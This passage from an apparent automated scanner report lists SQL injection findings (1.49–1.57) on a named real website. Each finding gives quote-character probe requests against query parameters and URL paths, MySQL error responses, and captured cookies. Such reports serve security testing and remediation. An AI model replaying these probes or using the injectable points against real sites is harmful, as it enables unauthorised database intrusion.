   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.49. http://www.millerwelds.com/financing/ [int_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace'&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:52 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace''&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:53 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.50. http://www.millerwelds.com/financing/ [int_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad'&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:33 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad''&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:35 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.51. http://www.millerwelds.com/financing/ [int_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/'&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:17 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/''&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:18 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.52. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:40 GMT
Connection: Keep-Alive
Content-Length: 13917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:41 GMT
Connection: Keep-Alive
Content-Length: 15803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.53. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:51 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:52 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.54. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:44 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:45 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.55. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.57. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
